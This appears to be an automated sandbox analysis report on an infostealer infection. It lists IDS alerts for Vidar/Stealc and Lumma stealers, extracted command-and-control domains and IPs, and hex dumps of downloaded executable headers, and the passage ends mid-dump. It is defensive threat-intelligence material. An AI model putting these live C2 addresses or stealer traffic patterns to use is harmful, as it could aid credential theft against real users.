Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_0036FF78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_00357F88

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49745 -> 141.98.233.156:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 141.98.233.156:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 141.98.233.156:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.4:63578 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.4:53531 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.4:52021 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.4:60166 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.4:63119 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.4:54848 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.4:63998 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:57018 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.4:58481 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:57019 -> 104.21.93.202:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:57019 -> 104.21.93.202:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: soldiefieop.site
Source: Malware configuration extractor URLs: chorusarorp.site
Source: Malware configuration extractor URLs: absorptioniw.site
Source: Malware configuration extractor URLs: questionsmw.stor
Source: Malware configuration extractor URLs: treatynreit.site
Source: Malware configuration extractor URLs: abnomalrkmu.site
Source: Malware configuration extractor URLs: mysterisop.site
Source: Malware configuration extractor URLs: snarlypagowo.site
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:57012 -> 162.159.36.2:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:26 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:32 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:32 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:33 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:33 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:34 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:34 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 